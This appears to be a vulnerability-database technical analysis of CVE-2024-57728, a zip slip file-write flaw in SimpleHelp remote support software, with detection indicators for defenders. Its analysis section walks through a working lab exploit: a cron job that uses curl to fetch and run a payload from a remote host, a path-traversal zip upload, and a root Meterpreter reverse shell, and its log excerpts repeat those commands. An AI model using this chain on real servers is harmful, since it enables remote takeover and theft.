Very High
CVE-2024-57728
CVE-2024-57728
Description
SimpleHelp remote support software v5.5.7 and before allows admin users to upload arbitrary files anywhere on the file system by uploading a crafted zip file (i.e. zip slip). This can be exploited to execute arbitrary code on the host in the context of the SimpleHelp server user.
Add Assessment
Technical Analysis
Overview
Between January 8th and 13th 2025, SimpleHelp RMM released patches for a set of vulnerabilities including an authenticated file upload affecting the following versions:
- 5.5.x prior to 5.5.8 (patched January 8th)
- 5.4.x prior to 5.4.10 (patched January 8th)
- 5.3.x prior to 5.3.9 (patched January 13th)
This authenticated file upload vulnerability is able to be chained with CVE-2024-57727 an unauthenticated path traversal resulting in unauthenticated remote code execution (RCE) in the affected versions. On January 22 2025 Artic Wolf began observing a campaign involving unauthorized access to devices running SimpleHelp RMM software as an initial access vector. Note that although this campaign has been recognized and CVE-2024-57727 has been added to the CISA KEV list, CVE-2024-57728 has not yet been added.
The exploitability has been rated High because although it’s trivial to exploit with credentials it is authenticated via a custom authentication protocol which complicates automating exploitation. The attacker value has been rated Very High because when chained with CVE-2024-57727 it can provide privileged unauthenticated remote code execution (RCE).
Analysis
SimpleHelp hosts a Previous Release where Build 5.5.7 and Build 5.5.8 can both be downloaded from. If we download the Linux 64 bit tar file we will have a file named SimpleHelp-linux-amd64-5.5.8.tar.gz. Extract the contents and we have the following directory structure:
msfuser@msfuser-virtual-machine:~/testing_simple_help/SimpleHelp$ ls -l total 56 drwxrwxr-x 2 msfuser msfuser 4096 Jul 23 2024 admin drwxrwxr-x 5 msfuser msfuser 4096 Jul 23 2024 configuration -rwxr-xr-x 1 msfuser msfuser 4132 Jul 23 2024 console.sh drwxrwxr-x 14 msfuser msfuser 4096 Oct 16 14:32 DEPLOY drwxrwxr-x 5 msfuser msfuser 4096 Oct 16 14:32 images drwxrwxr-x 6 msfuser msfuser 4096 Jul 30 2024 jre drwxrwxr-x 5 msfuser msfuser 4096 Feb 20 09:09 lib -rwxr-xr-x 1 msfuser msfuser 4132 Jul 23 2024 serverstart.sh -rwxr-xr-x 1 msfuser msfuser 4132 Jul 23 2024 serverstop.sh -rw-rw-r-- 1 msfuser msfuser 6212 Oct 16 14:31 USAGE_TERMS.txt
SimpleHelp is a java application which is packaged inside: lib/shelp-jar-with-dependencies.jar. We can decompile and save the source files. Once we have the source for both the patched and unpatched versions, diff the two using your preferred diffing tool.
msfuser@msfuser-virtual-machine:~/testing_simple_help$ meld 5_5_7/ 5_5_8/
Navigating through the patch we can see that the function extractZip in the ZipUtils class was vulnerable to a zip slip vulnerability prior the the patch in 5.5.8. Previously extractZip didn’t verify the file path before writing the contents of the file. This allows file paths containing ../ which allow for an arbitrary file write.
Finding out how to trigger this from an authenticated context is trivial as the extractZip function is only called from one place in the entire application, the ProxyServerUpgrader class:
Tracing backward further through the source code (or by taking an educated guess based on the contents above screenshot) we find that the restartSelf function of the ProxyServerUpgrader class gets called when a SimpleHelp Administrator chooses to Restore From Backup inside the Configuration Backup settings of the Administration Panel:
To exploit this vulnerability we can authenticate to the application, using the credentials obtained through exploit CVE-2024-57727. In the Configuration Backup settings we will choose to Create Backup Now, so we can upload a valid Backup file when we exploit the zip slip. The file will save as: simplehelp_backup_250219_123329.zip. Unzip the file:
msfuser@msfuser-virtual-machine:~/testing_simple_help$ unzip simplehelp_backup_250219_123329.zip Archive: simplehelp_backup_250219_123329.zip inflating: configuration/toolbox/toolboxdb inflating: configuration/shlicense.txt ...
Generate a fetch payload command using msfconsole:
msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > generate -f raw curl -so /tmp/LCJSmTNSPfVM http://172.16.199.130:5453/7IH_n64ep-e10j3LFxxxxg;chmod +x /tmp/LCJSmTNSPfVM;/tmp/LCJSmTNSPfVM&
Create a payload file which we will upload as a cronjob:
msfuser@msfuser-virtual-machine:~/testing_simple_help$ echo "* * * * * root /bin/bash -c 'curl -so /tmp/LCJSmTNSPfVM http://172.16.199.130:5453/7IH_n64ep-e10j3LFxxxxg;chmod +x /tmp/LCJSmTNSPfVM;/tmp/LCJSmTNSPfVM&'" > evilcronjob
Move the payload file such that the following path: ../../../../../../etc/cron.d/evilcronjob is valid and contains the payload we just created. Then rezip the SimpleHelp configuration and cronjob together. Note the depth of the path traversal may be different depending on the installation of SimpleHelp:
msfuser@msfuser-virtual-machine:~/testing_simple_help$ zip -r simplehelp_backup_edited.zip configuration/ ../../../../../../etc/cron.d/evilcronjob adding: configuration/ (stored 0%) ... adding: ../../../../../../etc/cron.d/evilcronjob (deflated 21%)
With the Metasploit payload handler started, upload the simplehelp_backup_edited.zip file via the Restore From Backup button in the UI, as shown in the screenshot above. Then, simply wait for the cronjob to run and a Meterpreter session to be established:
msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > to_handler [*] Payload Handler Started as Job 2 msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > [*] Started reverse TCP handler on 172.16.199.130:4445 [*] Sending stage (3045380 bytes) to 172.16.199.130 [*] Meterpreter session 2 opened (172.16.199.130:4445 -> 172.16.199.130:52282) at 2025-02-19 17:04:01 -0800 msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > sessions -i 2 [*] Starting interaction with 2... meterpreter > getuid Server username: root meterpreter > sysinfo Computer : 172.16.199.130 OS : Ubuntu 22.04 (Linux 6.8.0-52-generic) Architecture : x64 BuildTuple : x86_64-linux-musl Meterpreter : x64/linux meterpreter >
IOCs
By default the Server Log will log ProxyServer requests to restore configurations from backup. The log should be accessed from the SimpleHelp Technician Console, as it’s encrypted and you won’t be able to read it directly from disk. If you notice any unauthorized attempts to restore configuration from backup this likely indicates you’ve been compromised.
20/02 09:50:21.543: M649-20 17:50:21.542 (+22489) [FS] Delete configuration/restoredconfig.zip 20/02 09:50:21.573: M649-20 17:50:21.573 (+ 31) [ProxyServer] Restart of server requested by SimpleHelpAdmin - SimpleHelpAdmin [SimpleHelpAdminGroup] 20/02 09:50:21.573: M649-20 17:50:21.573 (+ 0) [ProxyServer] Apply config? true 20/02 09:50:21.573: M649-20 17:50:21.573 (+ 0) [ProxyServer] User is admin, server will restart now 20/02 09:50:21.573: M649-20 17:50:21.573 (+ 0) [ProxyServer] New config is to be applied, deleting any temporary restoration files 20/02 09:50:21.574: M649-20 17:50:21.574 (+ 1) [ProxyServer] Renaming uploaded config ready for hashing 20/02 09:50:21.574: M649-20 17:50:21.574 (+ 0) [ProxyServer] Hashing uploaded config 20/02 09:50:21.578: M649-20 17:50:21.578 (+ 4) [ProxyServer] Config hash matches, extracting now 20/02 09:50:21.589: M649-20 17:50:21.589 (+ 11) [ProxyServer] Preparing to fork and restore 20/02 09:50:21.592: M649-20 17:50:21.590 (+ 1) [ProxyServerUpgrader] PID is 2536 20/02 09:50:21.593: M649-20 17:50:21.590 (+ 0) [ProxyServerUpgrader] Checking for systemd parent service...
As shown in the analysis above the easiest way to gain RCE from this file upload on SimpleHelp instances running on unix systems is to upload a cron job. Check for unauthorized cronjobs in /etc/cron.d/ or grep for suspicious cronjob logging (note the metasploit fetch payload being run):
msfuser@msfuser-virtual-machine:~/technician_console$ grep CRON /var/log/syslog | tail -100 Feb 19 16:30:01 msfuser-virtual-machine CRON[703449]: (root) CMD ([ -x /etc/init.d/anacron ] && if [ ! -d /run/systemd/system ]; then /usr/sbin/invoke-rc.d anacron start >/dev/null; fi) Feb 19 16:53:01 msfuser-virtual-machine CRON[706963]: (root) CMD (/bin/bash -c 'curl -so /tmp/YyZQMouNKe http://172.16.199.130:8080/suioN8mRyX9yGnG44toCUw;chmod +x /tmp/YyZQMouNKe;/tmp/YyZQMouNKe&') Feb 19 16:53:01 msfuser-virtual-machine CRON[706962]: (CRON) info (No MTA installed, discarding output) Feb 19 17:04:01 msfuser-virtual-machine CRON[708644]: (root) CMD (/bin/bash -c 'curl -so /tmp/YyZQMouNKe http://172.16.199.130:8080/suioN8mRyX9yGnG44toCUw;chmod +x /tmp/YyZQMouNKe;/tmp/YyZQMouNKe&') Feb 19 17:05:01 msfuser-virtual-machine CRON[708686]: (root) CMD (/bin/bash -c 'curl -so /tmp/YyZQMouNKe http://172.16.199.130:8080/suioN8mRyX9yGnG44toCUw;chmod +x /tmp/YyZQMouNKe;/tmp/YyZQMouNKe&') Feb 19 17:10:01 msfuser-virtual-machine CRON[709431]: (root) CMD (/bin/bash -c 'curl -so /tmp/YyZQMouNKe http://172.16.199.130:8080/suioN8mRyX9yGnG44toCUw;chmod +x /tmp/YyZQMouNKe;/tmp/YyZQMouNKe&') Feb 19 17:17:01 msfuser-virtual-machine CRON[710142]: (root) CMD ( cd / && run-parts --report /etc/cron.hourly) Feb 19 17:30:01 msfuser-virtual-machine CRON[711403]: (root) CMD ([ -x /etc/init.d/anacron ] && if [ ! -d /run/systemd/system ]; then /usr/sbin/invoke-rc.d anacron start >/dev/null; fi)
Note that because this RCE can give privileged access it would be possible for an adversary to attempt to cover their tracks entirely depending on their desired opsec.
References
CVSS V3 Severity and Metrics
General Information
Vendors
Products
References
